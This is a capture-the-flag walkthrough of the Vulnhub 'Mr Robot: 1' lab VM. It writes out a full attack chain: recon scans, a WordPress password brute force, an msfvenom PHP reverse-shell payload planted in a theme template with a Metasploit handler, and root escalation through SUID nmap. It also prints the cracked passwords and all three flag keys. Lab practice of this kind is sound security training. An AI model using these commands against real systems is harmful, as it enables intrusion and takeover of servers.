Mr Robot:1 CTF Walkthrough

Title-mr-robot

 

Mr Robot: 1 CTF (Capture the Flag) is a downloadable Virtual Machine from Vulnhub.  Which is a site that has purposely built Virtual machines for you to hack. Each one varies in difficulty and allows you to hone your skills and even pick up new ones.

 

If your interested in giving it a go yourself, this Virtual Machine can be downloaded here https://download.vulnhub.com/mrrobot/mrRobot.ova

Description:

Based on the show Mr Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is Progressively difficult to find.

The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

So I downloaded the virtual machine from vulnhub and then just double clicked the mrRobot.ova file and it set its self up in virtualbox.

I set the network up so only the Mr Robot VM and kali Linux where on the same subnet, to make it easier to find and you don’t really want to be exposing Vulnerable Virtual machines on your live network. The VM has DHCP enabled so it gets a DHCP lease straight off the bat.

My first step is to find out what ip the VM is on and what goodies it has to offer, So I run Nmap to find all this out for me.

nmap -A 192.168.1.1/24

and it gives me this information back.

Nmap scan report for 192.168.1.103
Host is up (0.00029s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
MAC Address: 08:00:27:C1:4A:90 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.19

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS
1 0.29 ms 192.168.1.103

As you can see looks like we have an Apache web server running with ports 80 and 443 open, so lets check them out first.

 

mrrobotlogin

With both http and https we get presented with a cool animation of a linux terminal booting up and Mr Robot logging in.

mrrobotport80

 

At the prompt the only commands that work are the 6 listed above. Each one takes you to its own page which contains all sorts of Mr Robot propaganda it looks like its a rip of a Mr Robot promotional website. Took note of each page just in case i needed it later.

http://192.168.1.103/prepare
 http://192.168.1.103/fsociety
 http://192.168.1.103/inform
 http://192.168.1.103/question
 http://192.168.1.103/wakeup
 http://192.168.1.103/join

Looking at the source we can see this animation has been created in javascript also there is some interesting info on line 15, I would like to just add “i am not expert in javascript” but it looks like if you have an ip of 208.185.115.6 you get taken to index.html.

Mrrobotsource

 

At this stage I thought it was time to check out the robots.txt

http://192.168.1.103/robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

Boom!  So it looks like I have found key-1-of-3.txt and a fsocity.dic file .

I first navigate to the key file at http://192.168.1.103/key-1-of-3.txt and get the first key  073403c8a58a1f80d943455fb30724b9

Then I download fsocity.dic which is just a dictionary file, I’m guessing this is something that we will have to use later so ill keep that somewhere safe.

When the dictionary file had finished downloading, I kind of just mashed the keyboard with adfsda after the IP address and I received  wordpress 404 page as below

wordpress404MrRobot

 

Clicking around the menus, I quite quickly found the Word Press login page at http://192.168.1.103/wp-login.php

Now we know its a Word Press site we can  try and enumerate users using Wpscan

wpscan --url 192.168.1.103 --enumerate u

This actually did not find any users for me, so I started to use process of elimination and tried  admin, root and  user all giving me a Invalid username

invalideusernameMrrobot

So still with no users, I start to use names from characters in the TV series, starting at mrrobot,  flipper and then we get a hit with elliot ..

elliotwrong password

Cool so we have a user the next step will be to use that dictionary file we downloaded earlier and see if we can  brute force the password for this account. so lets take a look at the dictionary file…

first thing I notice when I cat the dictionary file is that its not in any sequential order. This can rectified  by just running a sort command in the Linux terminal

sort fsocity.dic >fsocitysorted.dic

I cat the new fsocitysorted.dic file and noticed there are a lot of repeated words, so we can run the sort command again but pipe it into the uniq command as below, giving us a nice and tidy dictionary file for us to run our brute force against.

sort fsocity.dic | uniq > fsocitysortunique.dic

So lets use wpscan again to brute force the login using our new dictionary file as so.

wpscan --url http://192.168.1.103 --wordlist /location/of/wordlist/fsocitysortunique.dic --username elliot

 

bruteforcewpscan

This took about 3 minutes to find this password for elliot.

  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+

I put the above details in to http://192.168.1.103/wp-login.php page and bingo we are into the WordPress dashboard.

loggedinelliot

 

Now we are into the Word Press Dashboard we can quite easily use metersploit to create a payload and gain a shell on the web server.

Our First step is to create our metersploit payload using msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=7771 -f raw -o payload.php

Now we have our payload, we need to get this on the site and run it. The best place for this is the 404 page template

In the dashboard go to the menu on the left and click on Appearance –> Editor –> then on the right click 404 Template.

Next open up your payload with any text editor and copy the contents over the top of the 404 template and click update file.

now we need to create our payload handler in metersploit so open up a new terminal and type …..

$ msfconsole
$ use exploit/multi/handler
$ set payload php/meterpreter/reverse_tcp
$ set LHOST 192.168.1.104
$ set LPORT 7771
$ run

After you typed ‘run’ and hit enter your payload handler should start and all we need to do now is run our payload by making the site display a 404 page and we are in.

[*] Started reverse TCP handler on 192.168.1.104:7771 
[*] Starting the payload handler...
[*] Sending stage (33721 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.104:7771 -> 192.168.1.103:54730) at 2016-08-19 17:00:48 +0100

meterpreter > 


Then in meterpreter just type shell to spawn a shell on the box and then check what directory  we are in and which user we are.

meterpreter > shell 
Process 1797 created.
Channel 0 created. 
pwd 
/opt/bitnami/apps/wordpress/htdocs 
whoami 
daemon

Then I changed directory to the root of the drive and list every thing that’s there.

cd / 
ls 
bin 
boot
dev 
etc 
home 
initrd.img 
lib
lib64
lost+found
media
mnt
opt
proc
root 
run 
sbin 
srv 
sys 
tmp
usr
var
vmlinuz

I start by checking out the home folder, this seems to have just one folder in it called robot, so I navigate into the robot folder and it looks like we have found our next key and an md5 file.

cd home
ls
robot
cd robot
ls
key-2-of-3.txt
password.raw-md5

First I try to cat the contents of the key file, but I get a permission denied,  I also try the password.raw-md5 file this time it does display the contents on the screen see below.

cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

So it looks like we have a username and a md5 hashed password.. I could run this through hashcat but I thought as this is a easy hackable VM, I would google the hash first and as I thought the hash comes back quite quickly as abcdefghijklmnopqrstuvwxyz.

md5hashmrrobot

I try and switch user to robot but I keep getting a message telling me that su must be run from terminal.

su robot 
su: must be run from a terminal

This shows that we don’t have a proper shell running, so we can use a bit of python foo to get full terminal access using this command below.

python -c 'import pty; pty.spawn("/bin/bash")'

We can tell we are in the proper shell as the start of the line tells us what user we are, the name of the server and then what folder we are in.

[email protected]:/home/robot$

So we try and switch to the robot user again and we now get prompt to enter the password .  Once we have entered the password for the MD5 hash we are now logged in as Robot.

[email protected]:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

[email protected]:~$

now that we are logged in as robot, we should be able to cat the contents of that key file as we now have the right permissions.

[email protected]:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Now with key 2 found we just have one more to find. I’m guessing to do this we need to escalate privileges again to become the root user. I tried a few exploits off exploitDB but none of these worked  so i started looking at other ways to get to root.

Dumping out the list of processes shows Nmap is set to run as root.

find / -perm +6000 2>/dev/null | grep '/bin/'
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap

After a lot of googling I found there is a vulnerability in Nmap, which you can set into interactive mode and allows you to run shell commands directly in nmap.

[email protected]:/$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# ls
ls
bin   dev  home        lib    lost+found  mnt  proc  run   srv tmp  var
boot  etc  initrd.img  lib64  media   opt  root  sbin  sys usr  vmlinuz
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt

so we escalated our privileges to root through the interactive shell and navigated to the root folder as u can see above this holds our final key which we cat to give us ….

cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Now we have all 3 keys that’s this Virtual Machine done… It was a really good virtual machine to get started with, also finding out about the privilege escalation using Nmap was fantastic and being a fan of Mr Robot TV show really helped with keeping me interested.

Going to go have another look at vulnhub and see if there are anymore TV/Movie tie ins that I can sink my teeth into….

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *